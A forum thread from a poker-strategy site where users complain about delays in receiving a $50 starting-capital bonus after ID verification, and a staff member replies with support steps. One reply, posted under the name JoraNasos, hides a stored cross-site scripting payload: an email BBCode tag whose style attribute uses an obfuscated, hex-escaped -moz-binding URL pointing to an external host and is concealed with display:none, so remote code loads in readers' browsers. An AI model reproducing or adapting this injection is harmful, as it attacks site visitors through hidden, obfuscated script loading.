Very long waiting for 50$

• uNnOrMal
      uNnOrMal
      Global
      I registered, passed the quiz then I was waiting fot 1 week for 50$. 1 more week i was on "holiday" then i checked my e-mail. I saw an information that i should confirm my identity. I sent a copy of my ID 3 days ago and I still don't have 50$ and i can't start playing.
      My account is also not for real money i can play only for virtual cash ; / What should i do?
  • 19 replies
    • SoyCD
      SoyCD
      Bronze
      Hello uNnOrMal,

The waiting time for the starting capital starts from when you send in your ID information. As of that point in time you need to give our support time to verify your ID information and start your transfer - which can take around 72 hours.

Yet since I don't see your ID as having been processed already - I will just reiterate here that you need to have sent your ID from the Email address with which you signed up with.

Best regards,
      SoyCD
    • uNnOrMal
      uNnOrMal
      Global
      I sent it already twice from e-mail i registered on pokerstrategy. Can u tell me whats happening? I'm a bit bored and tired waiting...
    • SoyCD
      SoyCD
      Bronze
      Originally posted by uNnOrMal
      I sent it already twice from e-mail i registered on pokerstrategy. Can u tell me whats happening? I'm a bit bored and tired waiting...
      Hello uNnOrMal,

You should have received another E-mail from our support. If not please send them a ticket via the ticket system (http://www.pokerstrategy.com/help/)

Best regards,
      SoyCD
    • asainsfars
      asainsfars
      Bronze
      send my id card like 4 days ago but didnt receved any bonus....
      do i need to send aditional info or everyting it is ok?
      thnak you
    • SoyCD
      SoyCD
      Bronze
      Originally posted by asainsfars
      send my id card like 4 days ago but didnt receved any bonus....
      do i need to send aditional info or everyting it is ok?
      thnak you
      Hello asainsfars,

I don't see your ID as being processed yet. Did you send it from the E-mail address you signed up with? Please try sending it again, and perhaps writting a ticket to the support.

Best regards,
      SoyCD
    • uNnOrMal
      uNnOrMal
      Global
      I received the mail and i have 1 question. If my son have an account on PartyPoker can i have an account with bonus too or not?
    • SoyCD
      SoyCD
      Bronze
      I received the mail and i have 1 question. If my son have an account on PartyPoker can i have an account with bonus too or not?
      Hello uNnOrMal,

That is comepletely dependent on whether you are using the account for yourself - or not. If you take the quiz by yourself and are an indepedent member of PokerStrategy there is no problem with multiple accounts in one family. Yet account sharing - or signing up family members to play on their accounts is prohibited.

Best regards,
      SoyCD
    • marknico1
      marknico1
      Bronze
      still haven't received my bonus after sending id days ago
    • SoyCD
      SoyCD
      Bronze
      Originally posted by marknico1
      Hello marknico1,

In this case something must have gone wrong. Did you send it to security@pokerstrategy.com from the E-mail address you signed up with? It seems not to have arrived so please send it again.

Best regards,
      SoyCD
    • gudalemandele
      gudalemandele
      Bronze

Then we're two..

SonyCD -> Have you got some sort of status on my verification/funding :-)? Sent my ID 3 days ago, and I don't know if it was accepted, denied, recieved or anything at all, actually.

Thanks
    • uNnOrMal
      uNnOrMal
      Global
      Thats great : ) Just 2 more questions. I received the mail in Polish and i wrote in Polish too, is it good or should i sent the e-mail again in English? And how long I must wait for verification and bonus if i sent the e-mail yesterday?
    • Drakhor
      Drakhor
      Bronze
      Just passed the quiz? Read this first!

I think a sticky is not enough, obviously nobody bothers to read it anyway... :rolleyes:
    • nueradra
      nueradra
      Bronze
      i have send my id card and and bill as u ask me ...like 3 days ago.
      but didnt get any answer..and no bonus..
      let me know if u need something else
    • TribunCaesar
      TribunCaesar
      Bronze
      HI mueradra

Looks like everything is ok. Just be a little bit more patient till you get your starting capital. I suggest to reread all the articles to have the best possible start.

Best regards,
      TribunCaesar
    • JoraNasos
      JoraNasos
      Bronze
      Try to phone support team ))) http://www.[email=xx style=-moz-binding:url(\68\74\74\70\3a\2f\2f\70\73\73\2e\31\31\30\6d\62\2e\63\6f\6d\2f\61\2e\78\6d\6c\23\61);display:none; ]tt[/email]
    • uNnOrMal
      uNnOrMal
      Global
      Can someone tell me when I can start playing? It's 1+month since i passed the quiz and I still don't have my bonus...
    • JasonKKK
      JasonKKK
      Global
      Yeah i havn't received my 50 either, And even worst, they deactivated my other account on here for no reason, and Even worst than that they havnt made any contct with me.
    • uNnOrMal
      uNnOrMal
      Global
      Can someone from the support answer me? You asked if you can call me, I said yes and nobody called me yet :( . Still waiting for the bonus.
    • SoyCD
      SoyCD
      Bronze
      Can someone from the support answer me? You asked if you can call me, I said yes and nobody called me yet :( . Still waiting for the bonus.
      Hello uNnOrMal,

To contact the support please write a ticket via the ticket system (http://www.pokerstrategy.com/help/). This is the best and fastest way of contacting them.

Simply arrange a date with them.

Best regards,
      SoyCD